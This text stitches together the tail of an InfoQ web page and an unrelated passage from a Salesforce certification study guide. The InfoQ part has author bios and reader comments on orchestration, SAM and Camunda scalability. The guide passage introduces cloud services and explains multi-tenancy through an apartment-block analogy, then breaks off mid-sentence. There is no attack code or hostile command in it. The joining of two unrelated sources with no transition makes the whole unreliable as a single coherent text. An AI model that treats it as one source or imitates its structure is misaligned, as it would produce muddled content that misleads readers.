During that time he contributed to various open source projects, wrote two books and co-founded Camunda. Currently he thinks about how flows will be implemented in next generation architectures. Martin Schimak has been into long running flows for 15 years, in fields as diverse as energy trading, wind tunnel organization and contract management of telecommunication companies. As a coder, he has a soft spot for readable APIs and testable specs and made manifold contributions on GitHub. As a domain “decoder”, he is on a first name basis with Domain-Driven Design as well as BPMN, DMN and CMMN. He is also co-editor of the german software magazine OBJEKTspektrum. Rate this Article - Editor Review - Chief Editor Action Hello stranger!You need to Register an InfoQ account or Login or login to post comments. But there's so much more behind being registered. Get the most out of the InfoQ experience. Tell us what you think SAM Pattern by Jean-Jacques Dubray thank you for such a precise and complete article on the topic. I am not sure if you ever came across or considered using the SAM Pattern for orchestration. Classical State Machines (Petri Nets) tend to have some issues. TLA+ offers a much better foundation for this kind of state machines. I created a couple of years ago a Java and Javascript library (someone is actually currently porting it to C#). I would not recommend using "Sagas" or "Workflow". This is small example that illustrates how the library works. The main advantage of SAM is that it gives you a robust state machine structure, in code. No need to use a different language. Even better the state machine structure is nearly invisible to the developer. AsyncAPI specification by Francisco Méndez Vilas Great! by Leonardo Rafaeli Question: How scalable is Camunda? Assuming I spawn loads of containers, will Camunda work well against parallel processing? Or it will centralize all workflow instance information into a single server? Re: Great! by Bernd Ruecker Camunda is very scalable, we have big customers using it in huge scenarios. The limitation of the current architecture is the relational database used underneath. So you can spawn a lot of containers and work can be perfectly distributed - but a logical cluster meets on the database - which can become the bottleneck in very high-load scenarios. The few customers who are facing this use logical shards to run mutliple logical Camunda instances. With microservices every Microservice can quite naturally become a shard on its own, easing load on the various Camunda instances very much. So this typically is no problem. If you still worry about scalability one additional hint: we work on a next generation engine which implements persistence differently (basically using event sourcing). We will release the first version and put it open source next month - stay tuned :-) Cheers Bernd Re: Great! by Martin Schimak many thanks for your encouragement. :-) As it's out now, I add the link to the new open source project Bernd was referring to in his answer: zeebe.io/ Cheers, Martin.
https://www.infoq.com/articles/microservice-event-choreographies?utm_source=infoq&utm_medium=popular_widget&utm_campaign=popular_content_list&utm_content=presentation
CC-MAIN-2017-47
refinedweb
4,846
52.7
Hi, I am using XQuery as part of my Java application. I have a need to define namespaces and some commonly used functions in an xquery file which would be packaged in a jar. This file would then be imported by other xqueries. however, the imported file would have to be loaded from the classpath. I came across an open source implementation which does this. The link is. A brief description of the way they do it - If the XQuery module is part of a Java application, it might also be an option, to pack the module into a Java archive (.jar file) along with the Java classes and use the following import to load the module from a Java package: import module namespace status="" at "resource:org/exist/xquery/lib/test.xqm"; I think it'd be really great to have this feature as part of Saxon as well. Thanks. Regards Kaizer Ivan Toshkov 2008-05-16 Logged In: YES user_id=718 Originator: NO One way to do that in Saxon is to create a subclass of ModuleURIResolver, which can handle loading xqueries off of CLASSPATH.
http://sourceforge.net/p/saxon/feature-requests/22/
CC-MAIN-2014-10
refinedweb
187
70.43
I’ve always been fascinated by the beauty of EPROM chips with their erasure windows giving you a clear look inside the package. Because of my fascination, I ended up buying quite a few chips, an UV eraser that needed some repairing and a programmer. I think it’s clear that from having these items, one of the questions I could provide an answer to was the often asked “how long does it really take to erase an EPROM?” The Science of Erasure I’ll probably start off by saying that I’m no expert when it comes to the device physics of EPROMs, but in a nutshell, an EPROM works by being first programmed which causes charge to accumulate in a region separated from the bulk of the material by an oxide insulator forming the programmed state. To erase the EPROM requires external UV light of 400nm or shorter wavelength to ionize the oxide allowing the stored charge to dissipate, reverting the cell to an unprogrammed state. The process causes damage over repeated cycles. Programming generally aims to store sufficient charge in each cell to be detectable, plus a small margin to ensure data retention in case of extremely slow leakage and/or different voltage/temperature operational conditions. If we look at two examples of erasure procedures from datasheets (AMD AM27C040 on the left, ST M27C64A on the right), we can see that the dose needed to erase the unit is often claimed to be 15W.sec/cm² or 30W.sec/cm². The time is claimed to be 15-20 minutes or 30-35 minutes under a lamp of 12000μW/cm² power rating. To most people, this looks like gobbledygook. You don’t go into a shop and ask for a lamp with a 12000μW/cm² power rating, for one, and why so complicated? Why not 12mW/cm² (which is equivalent, with a lot less zeros)? Why not 30J/cm² (which is equivalent to 30W.sec/cm²)? Maybe the reasoning has been lost on me because I wasn’t a technician in the late 70’s … I wasn’t even born, but it just seems peculiar and oddly specific. Instead, lets work the problem the reverse way. Lets first work out what the power rating of a regular G5 4W eraser tube would be. Thanks to Philips, their datasheet gives us virtually everything we need to know. Tube Output -> 0.9W UV-C Tube Length -> 13.59cm (including caps) Tube Diameter -> 1.6cm Tube Surface Area π * 1.6 * 13.59 = 68.31079065965646417713171772603 cm² Output Flux 0.9 / 68.31 = 0.01317507807052113706696057643812 W/cm² = 13.175 mW/cm² Aha! As it turns out, we’ve been sitting on a lamp with a power rating of 13175μW/cm² all along. Actually, probably slightly higher since the length includes the opaque caps where no radiation is emitted, so the total radiated power is concentrated into a slightly shorter length. Knowing this, you could just take the suggested times and use it with your 4W eraser as the power is pretty much “close enough”. But if we want to do the math … 15W.sec/cm² = 15 / 0.013175078 = 1138.5131 s = 18 minutes 58 seconds 30W.sec/cm² = (above result) * 2 = 37 minutes 57 seconds It corresponds fairly well to the suggested time frames, although with a few minutes of difference. In actuality, depending on the conditions of the EPROMs, time to erasure can probably be even shorter. The reason is that the specification sheets are often more conservative than necessary, to ensure that every part is erased sufficiently, and probably incorporates a margin. You could probably save some damage to the chips by shortening the erasure time, at the risk of “incomplete” erasure if you don’t expose them long enough. Erasure Experiment Preparation In order to prepare for the experiment, a single candidate of each type of EPROM (eight in total) was selected and programmed with the TL866CS programmer with all cells set to 0x00 (programmed state). The cells were verified, the window was cleaned with isopropyl alcohol, and then the chips were individually exposed to their method of erasure. The TL866CS was used to read-out and save the contents of the ROM after a period of erasure, and the erasure was repeated until the chip was erased completely (all cells 0xFF) or the test was aborted. All chips, with the exception of the M27C64A managed to take a program the first time. Unfortunately, the M27C64A appeared to be defective with an inability to check its ID or verify after programming on the TL866CS. The M27C64A datasheet was consulted in regards to programming. I t appears that the MiniPro programmer was using the right strategy, although with a slightly higher Vcc for verify. However, I’m not certain that the pulse delay feature is set correctly, as the claimed algorithm has 100uS pulses applied until the data verifies correctly. I suppose a longer delay shouldn’t harm anything though. Desperate to get the chip to operate, and curious as to how it got sold to me as “working” when it was so obviously problematic, I decided to tinker with the settings. I changed the program volts to 16V, which resulted in the lower byte programming successfully. This gave me some hope, but was a gross overvoltage. I pushed it another notch. At the maximum voltage of 21V, the chip programmed successfully and survived without permanent and instant damage. It seems that the Chip ID has changed to reflect the data on the chip as well – indicating that the chip probably doesn’t have ID circuitry or if it did, it’s not functioning correctly. This may be a counterfeit remarked chip of the wrong type, or a damaged chip of some sort. Regardless, it was used in testing in this state. Practical Erasure under 4W Tube The first step was to determine how long it would take to erase the EPROMs under the 4W UV tube. Each chip was separately exposed in 30 second blocks by using a remote switch, and then the data was read out until the chip was completely blank or I had reached the limit of my patience (15 minutes). Each of the dumped ROM files were processed to determine the number of set bits (erased bits) using a simple C program leveraging the inbuilt popcount function of GCC (see Appendix A). While in the post about the eraser itself, I looked at a single EPROM and made an animated GIF of it, I didn’t go to that length for these chips. Part of the reason was that many of the chips had so many cells in them that it wouldn’t be feasible to make web-resolution GIFs available (they’d be huge), and because by-and-large, the erasure trends weren’t significantly different. Instead, I’ve provided an image of the ‘roughly’ half-way erased point so that the patterns can be seen using the same conversion methodology. The time based results were as follows: The erasure of chips can be seen to follow an initial phase of (generally) no damage. This may indicate the charge leakage has occurred, but insufficient to change the status of the bit. This indicates the amount of excess charge stored during the programming phase, and thus the EPROMs resistance to “bit rot” assuming equally leaky insulating layers. After the charge has depleted sufficiently, a rapid rise to nearly completely erased follows. This means that the “bulk” population of cells has identical qualities (i.e. charge retained, insulating oxide leakiness, exposure to UV). This is followed by a (potentially) long period where a remaining minority of cells are slowly erased. This may be because of physical obscuring by dirt, scratches on the window, or due to cell structure/manufacturing defects. The amount of margin does appear to vary with the type of EPROM, but all types were erased (with the exception of the big M27C2001) in 720s or less, which is significantly below the datasheet recommended doses. This is probably because the datasheet recommends extra erasure to ensure full charge depletion to improve the margin between 0 and 1 for reliability reasons and to ensure validity of data under all specified Vcc and temperature conditions. I would recommend exposing for longer than the time required to show all erasure. The traumatized M27C64A (left) showed the smallest amount of margin, erasing almost immediately on exposure to the UV-C light. The erasure pattern shows some vertical bands, but is mostly scattered throughout. The next most sensitive was the M2716 (right). It seems these are older technology, lower density chips, and their sensitivity could be related to the larger per-cell area meaning more UV energy per cell and faster erasure (assuming the accumulated charge and charge level requirements keep the same). This one showed significant vertical bands of unerased areas, possibly alluding to structural differences or exposure differences to UV which can come about due to lens shape and mounting alignment of the chip. The third most sensitive chip was the M27C4001, a relatively large capacity chip. It had vertical patterns as well, although it also had one stripe which as a bit “out of pattern”. The earlier cells seemed to erase better than the later cells. The remaining chips were mostly clustered together for erasure times. The M27C2001 (Small) and M27C801 had almost identical profiles when it came to the rapid-rise portion of the graph. The M27C2001 (Small) had the most prominent vertical lines, where cells inbetween were mostly erased but those cells were more “programmed” or difficult to erase by comparison. The M27C801 proved even more odd with both vertical bands (strong), horizontal bands (moderate) and an area in the top left corner where it was consistently more difficult to erase. This may reflect the fact the M27C801 is a very large device, and the portions of circuitry that make up the chip may have been imaged on separately, or made up of several “slices” with slight differences in alignment or design. Or maybe it reflects its prior usage and abuse in programming or erasure. The next chip in sequence is the AM27C040 which didn’t rise as quickly (suggesting there was some variance in dose requirement in cells). It seems to have some vertical band repetition, but with semi-random noise in the distribution of erasure patterns. The M27C512 showed some areas of easy erasure (horizontal bands) interspersed with bands of difficult erasure (vertical bands). The M27C2001 (Big) seemed to show some interesting vertical bands (thin) and some sort of “patches” of easy to erase (near top and bottom corner). It kinda looks like a greyscale bad-photocopy when zoomed out. In all, the EPROM erasure process exposes the cells don’t all erase at the same rate for various reasons, and depending on how the cells are plotted (stride length across, order), can reveal odd periodicity patterns which probably reflect the physical structure of the memory array. A bit of technical art, I suppose. Practical Erasure under the Sun? As EPROM erasure can occur with the presence of 400nm and shorter wavelengths, a widely available source of such light is natural sunlight. Indeed, people have reported erasing EPROMs under sunlight, and datasheets warn against exposure to any external artificial fluorescent light or sunlight because of the possibility of slow erasure. I wanted to know just how long it would take to erase using the sun, so the first thing I did was to try and estimate this based on data that is available. If you use IEC60904-3 Ed.2 (2008), the reference solar spectral irradiance data is generated by NREL SMARTS. Table 1 gives the cumulative integrated irradiance from shorter wavelengths to longer wavelengths, normalized to 1000W/m² or “approximately” noon-time irradiation. At 400nm, the cumulative integrated irradiance is 45.97W/m². This can be converted to 4.597mW/cm². Depending on your atmospheric conditions, weather, latitude and obstructions, the amount of “peak sun hours” you get in a day can vary, as can the UV content. In my case, I would estimate about 3 PSH per day because of obstructions, so the total dose is about 13.791mJ/cm²/day. This means that in one second under the 4W eraser tube, we get the same amount of usable UV as you would expect for a day under sunlight. To erase a 15W.sec/cm² EPROM would take 1087 days (2.978 years) or twice as long for a 30W.sec/cm². This would be an impractical method of quickly erasing EPROMs, however, people online have reported erasure as quickly as in days to a week. This might be because the UV content in sunlight is really hard to estimate reliably based on models, but more likely, that the EPROMs may be affected by wavelengths slightly above the 400nm cut-off as well. Whatever the case is, I really wanted to see just how long it would take by experimental means. I chose the M27C64A (a potentially dud, but easy to erase chip) and the M27C801 (a large, averagely difficult to erase chip) to see just how long it would take. These chips had all cells programmed (0x00), windows cleaned with isopropyl alcohol, and sat in a breadboard outside in the backyard in a horizontal position. Every day (or few days in the later cases), the chips were returned inside briefly to be read-out until the chips showed full erasure (all cells 0xFF). As it turns out, this was a major reason why this post took so long to put online. The M27C801 only finally had all cells erased after 107 days, whereas the “easy” chip managed to clear-out after just 6 days. It seems that sunlight is stronger than the SMARTS based prediction indicated, especially noting that during the test period, we had some severe rain storms and it was winter in Sydney. Of course, it’s worth noting that EEPROMs which just return erased condition may not be entirely reliably erased especially if the Vcc varies or the read-out conditions change (I’ve had dissimilar readouts one after another for some borderline cells), so additional irradiation is needed to ensure full erasure (just as in when using the tube-based eraser). With the chips, it seemed the erasure followed a similar trend with the UV tube, with the majority of cells erasing in a smallish window of time, but with remaining “tough” cells taking significantly longer to clear. The M27C64A (day 3, left) showed a mostly even erasure profile with a few vertical bands noted. This probably reflects the structure of the chip internally and is similar to the tube based erasure results. The M27C801 (day 32, below) showed some differences compared to the tube based erasure, with the four vertical bands being much lighter, and the presence of new dark horizontal bands. This probably reflects some shadowing due to the large die and correspondingly sized window. I have a feeling that the M27C801 may have erased faster if the placement was more optimized. Because it was laying horizontally on the ground, and its window clearance to the size of the chip was relatively small, the angle of the sun may have caused portions of the chip to be shadowed for a good portion of the day, meaning that the dose received in those cells is only a small fraction of that received by the other cells (exaggerated in the drawing below). Tilting your chip towards the sun, so that the radiation goes through the window perpendicularly during noon-time may optimize the exposure of the cells and result in faster erasure. Conclusion It was determined that the “so called” 12000μW/cm² lamp is basically the low-pressure mercury UV germicidal tube that is employed by many erasers. By working out the flux from a 4W G5 tube, it was found that the emission was close to (slightly above) the level required by datasheets, so their claimed times should be applicable to these erasers. The actual time to report erasure was generally <=720s for EPROMs which were good. One unit failed to erase completely after 900s, however, may be restored after even further exposure and may have been an outlier (due to settled dirt inside the chamber potentially). Sun based erasure was investigated with SMARTS which predicted 3-year+ times to erasure. In practical cases, it appeared that 4-months was enough for the average case EPROM, with the weak one erasing within a week. Sunlight erasure can be practical depending on the EPROM, although tilting the alignment of the EPROM towards the sun will probably improve erasure speed by avoiding shadowing. To ensure reliability, erasure beyond the point where a device returns 0xFF may be necessary – the amount is probably up for discussion, but at least now I know the minimum amount of time exposure necessary to expect a clean EPROM, and thus, might be able to avoid excessive damage to chips when it comes to write-erase cycling them. Appendix: Counting Set Bits This is a short program intended for compilation with GCC to count the number of set bits in the input (stdio) and print the result to stdout. #include <stdio.h> int main (void) { int cchar; int accumulated=0; for(cchar=getchar();cchar!=EOF;cchar=getchar()) accumulated += __builtin_popcount(cchar); printf("%d",accumulated); return(0); } Try googling around for some of the history of population count instructions in computer hardware (particularly early “supercomputers”). Hint: they are a favorite of all the Three Letter Agencies… That gave me a chuckle … but yes, they seemed to like it for cryptanalysis and statistical analysis reasons. Having dedicated hardware abilities for very rapid/efficient processing. Luckily I’m not particularly worried about efficiency – it’s a very useful instruction (or compiler built in library function), especially when you’re just not bothered with writing a few lines of shifts and masks to do it crudely, or think even harder to optimize it. This reference seems to be the go when it comes to bit twiddling: – Gough I’m giving my age away here, but I left the naked eproms from my Microbee computer in the sun for a year to see what would happen. I made copies of them first, of course, and the copies were running in the computer. After all that time, I swapped them back, and everything still worked. They were 2732 types, as I recall. And yet, the UV eraser would erase them in about 15 minutes. I haven’t come across mention of Microbee anywhere in the blog; look it up, nice little Z-80 computer, made in Sydney. Mine had 64k of static RAM (6116), unheard of at the time.
http://goughlui.com/2016/09/11/experiment-time-to-eprom-erasure-by-uv-lamp-sun/
CC-MAIN-2017-22
refinedweb
3,130
58.72
Find & Filter React Children By Type Take control of your children in React for all environments Article Update: I’ve decided rewrite these utils from the ground up, add a bunch of new ones (including deep/recursive searching) and publish an NPM package for all to consume: This article will discuss the how-it-works for finding and filtering React children by type as it pertains to custom component children. If you are looking at finding and filtering core HTML Element (JSX Intrinsic Element) children like divs, spans, etc, please use react-nanny or see my other article for the how-it-works: This article will discuss finding and filtering React children by type as it pertains to core custom component children. If you are looking at finding and filtering core HTML Element (JSX) children like divs, spans, etc, please see my other article: There are situations in which knowing the type of each child passed to your component would be incredibly useful. For example, you might want to: - Validate that the consumer provides markup that you expect - Conditionally show or hide child items - Simplify the use of your component by allowing your consumer to pass in several children, but you want to place one of a certain type in a different location of your output JSX than the rest The task seems like it should be easy enough accomplish. After all, if you were to console.log(children), you’d see there’s a type key on each child. An internet search will uncover that you can easily do this: React.Children.toArray(children).map(x => console.log(x.type.name)); Let’s say we need to create a List component that accepts several ToDo components as children like this: And we define our components like this: We map over the children in List.jsx just like our internet search told us. Then we run our app and see the following in the console: ToDo ToDo ToDo We got exactly what we were looking for so we begin coding away… validating here; conditionally showing/hiding there. Our PR gets merged and we think to ourself, “Self, you really nailed it today.” However, we’re about to be in for a big surprise: It doesn’t work like we expect in production. So what’s the problem? If we were to run the same map and console.log in production, we’d see something like this: u u u It turns out that our app’s build has been optimized for production which includes… wait for it… minification! All of our component names and types have now been minified to something that is completely unpredictable that we can’t code against. Out of the darkness comes a solution! We can take advantage of the fact that literal string values do not get minified. Simply add a prop that you don’t advertise in your documentation and treat it as a constant. I’ve named it __TYPE in the example below, but you can name it whatever you like. Then give it a default value by defining it via PropTypes. If we were to now rewrite that mapping that we did at the top of this article to this: React.Children.toArray(children).map(x => console.log(x.props.__TYPE)); We would get this result in our console in all environments: ToDo ToDo ToDo I know what you’re thinking because I can read your thoughts, “What’s stopping the consumer from doing something like the following…?” <ToDo __TYPE="MoreLikeToDontAmirite?" /> The truth is that there really isn’t anything stopping the consumer from doing that. However, we’ve done two things that should immediately discourage people from doing this: - The prop name starts with not one, but two underscores which should indicate that this is definitely a private prop. - The prop name is in all caps which should indicate that it is a constant. Of course we can and should do more. We can take advantage of the fact that we can create a custom PropType that will notify the user with an in-your-face console error should they attempt to stray from the default: If we now update the ToDo.jsx component to consume this custom prop validator like this: …we should see the following in our console if we try to pass in a value for __TYPE in our App.jsx: Validate Your Children The List.jsx component, as it stands, can accept any child you throw into it, but that’s not desired behavior. For example, we don’t want someone to be able to pass in a div: We cannot stand for this kind of thing! Now that we can identify our children, we create another util to handle this situation for us. Consider the following: We feed the getChildrenByType function our children and an array of the types we want to include and the function will return only the children that have a matching __TYPE. The typeOfComponent helper function will check for our __TYPE under the hood. If that isn’t defined, it will next check the stringified type of the component which is helpful for finding HTML element children (i.e. divs, spans, etc.). If you’re interested in filtering those kinds of children, you can find the link to my other article at the top. Otherwise, you can ignore the details of type for now. That means we can update our List.jsx component with this function: When we run the updated code, we’ll notice that our list is nice and clean without the bogus div our consumer so carelessly injected. Note: If we’re using react-nanny, we can alternatively pass in the actual imported component as part of our types array if it’s in scope: import ToDo from './components/ToDo; ... <ul>{getChildrenByType(children, [ToDo])}</ul> Notice ToDo isn’t a string like it was before. However, if you don’t have your component in scope, you’ll definitely want to key off of a prop value like __TYPE and use a string value in your array. Conditionally Show/Hide Specific Children Sometimes you may want to show or hide specific children or children of a certain type based on the configuration of the parent component. To illustrate this, let’s create a new type of ToDo called ToDoCompleted which adds “- COMPLETED” to the end of the item: Next, we can add a new prop to our List.jsx component called hideCompleted which will conditionally hide or show completed todo items in the list. We can also conditionally add the ToDoCompleted type to the array that we’re passing to our getChildrenByType util function: If we now update our App.jsx to this: …and start our app, we will see this: If we were to add the hideCompleted prop to our list like this: <List hideCompleted> …we will see Item 2 removed from the list: Move Your Children Around Let’s say that the design team comes to us and says that all of the app’s todo lists should have completed items at the bottom of the list when they are to be displayed. We can accomplish this in List.jsx with our same util function: In the code above, we’re finding all ToDo children and all ToDoCompleted children and rendering each of those out instead of all children like we were before. However, if someone were to want the completed items hidden, they can still do that. If we start up our app, we should see Item 2 at the bottom: Why not simply use render props? I’m glad you asked. I am not anti-render prop. In fact, I use them quite frequently, but they aren’t a golden hammer solution for every problem. If you take our previous scenario with being required to move completed items to the bottom of the list, that was not an initial requirement. It was a requirement that was brought to us after the component already existed. In this case, we could refactor the component to accept a prop called renderCompleted that returns the completed items and we can invoke that function in the spot in our render markup where we want those items to be, but we will be breaking the props api contract which will necessitate action from all consumers. If the component source code lives in our app, we’d have to refactor every instance that it’s used. If the component is part of a distributed package, we’d have to publish a new major version which consumers would manually need to update in addition to refactoring every used instance. Meanwhile, you have some teams using the new and some using the old which can create a strange experience from the user as they use your product. In situations like that, it’s better to use this method and herd the children where they need to be. No breaking change; no consumer refactoring required. Speaking of render props (since you brought it up)… These techniques aren’t just for children, they also work with render props or any JSX for that matter. Let’s say you have a component with a render prop called renderActionArea and you expect that prop to return you one or more PrimaryButton components. How do you know the consumer is returning a PrimaryButton and not a div or a span or a SecondaryButton? Well, now you can! Simply… const actionArea = getChildrenByType(renderActionArea(), ['PrimaryButton']); Awesome! Do you have any other helpful utils? Yes! To recap the article update posted at the top, I’ve published an NPM package that has these utils re-engineered to handle additional situations and offer more options to give you flexibility. There are also many additional utils that we didn’t discuss in this article: react-nanny Utils to manage your React Children; find and filter children by type or custom function, enforce child content, and… Here is a list of the utils currently available in react-nanny: getChild— Gets first child by specified predicate getChildDeep— Gets first child by specified predicate (deep search) getChildByType— Gets first child by specified type getChildByTypeDeep— Gets first child by specified type (deep search) getChildren— Gets all children by specified predicate getChildrenDeep— Gets all children by specified predicate (deep search) getChildrenByType— Gets all children by specified type getChildrenByTypeDeep— Gets all children by specified type (deep search) noEmptyChildrenDeep— Ensure that there is some level of content and not just a bunch of empty divs, spans, etc (deep search) removeChildren— Removes all children by specified predicate removeChildrenDeep— Removes all children by specified predicate (deep search) removeChildrenByType— Removes all children by specified type removeChildrenByTypeDeep— Removes all children by specified type (deep search) typeOfComponent— Gets the string type of the component if defined by a prop, the string type of the core html (JSX Intrinsic) element, or the function type Go forth and be good to your React children! As a matter of practice, I highly recommend creating your own prop to identify what kind of component it is. Even if you think you’ll never use it, it’s good to have it in place for a time when it might save your bacon. If you’re needing to also filter core HTML Element components like divs, spans, etc., I highly recommend you continue on to my article on that topic:
https://mparavano.medium.com/find-filter-react-children-by-type-d9799fb78292
CC-MAIN-2022-21
refinedweb
1,898
55.88
RSS - Feed Formats RSS has been released in many different versions in the last 10 years. Here we will give you detail about three most commonly used RSS version. RSS v0.91 Feed Format RSS v0.91 was originally released by Netscape in 1999. RSS v0.91 does not have RDF header. RSS v0.91 is called Rich Site Summary (RSS). RSS v0.91 has features from Dave Winer's RSS version scriptingNews 2.0b1. RSS v0.91 has support for international languages and encodings. RSS v0.91 has support for image height and width definitions. RSS v0.91 has support for description text for headlines. Check complete set of - RSS v0.91 tags and syntax RSS v1.0 Feed Format RSS 1.0 is the only version that was developed using the W3C RDF (Resource Description Framework) standard. This version of RSS is called RDF Site Summary. RSS 0.91 and RSS 2.0 are easier to understand than RSS 1.0. Check complete set of - RSS v1.0 tags and syntax RSS v2.0/2.01 Feed Format: RSS 2.0/2.01 is very similar to RSS 0.9x. RSS 2.0/2.01 adds namespace modules and six optional elements to RSS 0.9x. RSS 2.0/2.01 specification was written by Dave Winer of Radio UserLand. The copyright was later transferred to Harvard University. Check complete set of - RSS v2.0 tags and syntax
http://www.tutorialspoint.com/rss/rss-feed-formats.htm
CC-MAIN-2017-13
refinedweb
240
80.28
Details Description. Issue Links Activity I've just committed this. Thanks again for the review, Todd.. oh, please run at least the following tests before commit: src/test/org/apache/hadoop/hdfs/TestDFSStorageStateRecovery.java src/test/org/apache/hadoop/hdfs/server/namenode/TestStartup.java src/test/org/apache/hadoop/hdfs/server/namenode/TestNameEditsConfigs.java src/test/org/apache/hadoop/hdfs/server/namenode/TestSaveNamespace.java src/test/org/apache/hadoop/hdfs/server/namenode/TestCheckpoint.java src/test/org/apache/hadoop/hdfs/server/namenode/TestEditLog.java src/test/org/apache/hadoop/hdfs/server/namenode/TestSecurityTokenEditLog.java src/test/org/apache/hadoop/hdfs/server/namenode/TestStorageRestore.java src/test/org/apache/hadoop/hdfs/server/namenode/TestCheckPointForSecurityTokens.java Thanks! +1, looks good to me. . Some of the new info messages should probably be debug level There were only a few new info messages. I changed one of them to debug, and made one other less verbose, since some of the info is only relevant in the event of an error, and in that case the extra info is printed as part of the exception. Do we also need to add some locking so that only one 2NN could be uploading an image at the same time? Agreed. This strictly necessary to fix the issue identified in this JIRA, but I agree that this is a potential for error as well. getNewChecksum looks like it will leak a file descriptor Thanks, good catch.. I thought about doing this. Thought it seems like it would make for a more straight-forward back-port, the back-port isn't easy regardless because of other divergences between trunk and branch-0.20-security. So, we don't seem to be gaining much by doing it this way, and since we wouldn't be storing the previous checksum as part of the VERSION file, we wouldn't be getting the intended benefit of HDFS-903 ("NN should verify images and edit logs on startup.") I'll upload a patch in a moment which addresses all of these issues, except the last one. Todd, if you feel strongly about it, I can rework the patch as you described to be a more faithful back-port of HDFS-903. - Some of the new info messages should probably be debug level - Do we also need to add some locking so that only one 2NN could be uploading an image at the same time? eg what about the following interleaving: - 2NN A starts uploading a good checkpoint which is large - 2NN B starts uploading an invalid checkpoint which is small, which overwrites fsimage.ckpt - 2NN B gets the cksum error, leaving its bad fsimage.ckpt in place - 2NN A finishes uploading, and calls checkpointUploadDone - B's fsimage.ckpt is rolled into place - getNewChecksum looks like it will leak a file descriptor - need a try/finally close -. Here's a patch which addresses the issue. This is a full and faithful back-port of HADOOP-7009 and a partial, minimal back-port of HDFS-903 which doesn't change the layout version, and instead calculates checksums for the fsimage on the fly. This patch is for branch-0.20-security. I should've mentioned - this patch is for branch-0.20-security. Here's a patch (not intended for commit) which contains a test that exercises this case, just to demonstrate the issue. The final assert will fail. Hey Suresh, unfortunately it does not. Though the CheckpointSignature object does include the editsTime and checkpointTime, CheckpointSignature.validateStorageInfo only validates the values of layoutVersion, namespaceID, and cTime, none of which change on a checkpoint. So, though the CheckpointSignature would prevent the NN from grabbing an invalid fsimage from a different file system, the NN can't tell the difference between an old fsimage and an up-to-date fsimage from the same file system. For reference: void validateStorageInfo(StorageInfo si) throws IOException { if(layoutVersion != si.layoutVersion || namespaceID != si.namespaceID || cTime != si.cTime) { // checkpointTime can change when the image is saved - do not compare throw new IOException("Inconsistent checkpoint fileds. " + "LV = " + layoutVersion + " namespaceID = " + namespaceID + " cTime = " + cTime + ". Expecting respectively: " + si.layoutVersion + "; " + si.namespaceID + "; " + si.cTime); } } Aaron, doesn't Checkpoint Signature prevent this problem from happening? Sounds like a plan @Todd - yep, I agree. Option 3 as-described is a subset of HDFS-903. Perhaps, then, the thing to do for this JIRA is to do a partial back-port HDFS-903 to the security 0.20-security branch in such a way so as to not require a change to the layout version. Since the goal of this JIRA is just to prevent receiving the wrong fsimage during checkpointing, not verify validity of the fsimage coming off disk, there's no need to store the checkpoint in the VERSION file. Rather, we can just compute the checksum on the fly, but still send it with the CheckpointSignature during checkpointing. There are two obvious work-arounds for this issue: - Explicitly configure the address of the 2NN ( {dfs.secondary.http.address} ). This would prevent 2NNs from starting up which couldn't bind to that address. - Do something else to make sure that there is only ever one 2NN running. But, we should still harden HDFS to make it so that this scenario is less likely to occur. Right now it's all too easy (with the default configs) to find oneself in this scenario. I can think of a few possible solutions: - Don't have a default value for the dfs.secondary.http.address. Require the user set it, and don't allow the 2NN to start up without it. The NN will reject connections to roll/fetch fsimage/edits from any machine that's not connecting from this configured address. - On start-up, the 2NN makes an RPC to the NN to generate a unique token. This token is subsequently used for all NN and 2NN communication. The NN will reject any communication from a 2NN with a different token. This will effectively lock out any previously-started 2NNs from mutating the NN state. - Before transferring the fsimage back to the NN, the 2NN computes a checksum of the newly-merged fsimage, and informs the NN of the expected checksum. On download of the new fsimage, the NN verifies the checksum of the downloaded file against the expected checksum from the 2NN. Of these, I think I'm inclined to go with option 3. Option 1 is dead simple, but has the downside of changing default config options and requiring an extra step to set up a Hadoop cluster. Option 2 seems like overkill to me. Option 3 is relatively simple, and has the added benefit of providing an extra integrity check of the fsimage state during network transfer. Thoughts? Closed upon release of Hadoop-1.1.0.
https://issues.apache.org/jira/browse/HDFS-2305?focusedCommentId=13094918&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel
CC-MAIN-2015-18
refinedweb
1,129
54.73
Salesforce is a company, founded by Marc Benioff and Parker Harris in 1999, that specializes in software as a service (SaaS). Salesforce started by selling a cloud-based Customer Relationship Management (CRM) application, which laid the foundation for many of its future services and was built on the Salesforce Platform. Following this, the company began packaging other applications that were closely intertwined on the same platform and divided them into clouds. These cloud-based applications are now popularly known as Sales Cloud, Service Cloud, Marketing Cloud, IoT Cloud, Integration Cloud, Community Cloud, Health Cloud, and Financial Services Cloud, among others. In this chapter, you will learn about the basic concepts of working on the Salesforce Platform. The material covered in this chapter represents 10% of the exam questions. We'll learn about the following topics in this chapter: We'll end the chapter with a summary and a quiz so that you can check whether you understand everything that you need to for the exam. We've brieflymentioned what Salesforce is in the introduction, but it's also important to know what the Lightning Platform is before we start talking about multi-tenancy. The Lightning Platform is the infrastructure in which companies can enable one or more of the aforementioned cloud products, install apps from the AppExchange (the Salesforce store), or build their own custom apps. Using the platform alone—that is, without one of the core cloud products such as Sales Cloud or Service Cloud—is also possible through Salesforce's platform as a service (PaaS) option. In a similar way to their CRM application, customers can pay a monthly fee to access the shared resources and build custom apps through PaaS. The biggest benefits of using or buying a cloud service product is that everything is taken care of by the provider – that is, the servers, storage space, the infrastructure, networks, security, backups, and upgrades. Some characteristics of using cloud-based services are as follows: - They are subscription-based models - They have low startup fees - They have fixed and predictable costs (that is, you pay as you use the service) - They are scalable - They include regular, automated upgrades - They are multi-tenancy platforms; this means that multiple customers use (or share) the same instance These are important features to bear in mind when talking about multi-tenancy! When I try to explain multi-tenancy to my customers, I always compare it to an apartment block. For example, consider a scenario, where you – as a company or a customer – rent an apartment in a block that is owned by Salesforce, who is your landlord: Here, your apartment has specific layouts and resources – that is, it has a number of rooms divided by walls. In addition to this, it has central heating, electricity, water, and more. To access and use this apartment, you pay a monthly rent, and everything else is taken care of for you and the other occupants in the building by your landlord. Apart from your apartment (which is your private space), all the other resources are shared by the occupants of the building. This means that if Salesforce decides to upgrade the central heating to underfloor heating, then you will automatically benefit from this. You can see this as three releases (that is, upgrades containing new features and enhancements) a year, which Salesforce implements. The preceding diagram represents the difference between buying a single house, which is yours (Single-Tenancy), and renting an apartment in a block with multiple apartments (Multi-Tenancy). Within your apartment, you can design your interior just the way that you want, and adjust it to your needs and personal preference! For instance, you can choose what room to have as your bedroom or your kitchen; or, alternatively, you can use the whole apartment as an office space. You can even paint the walls blue or 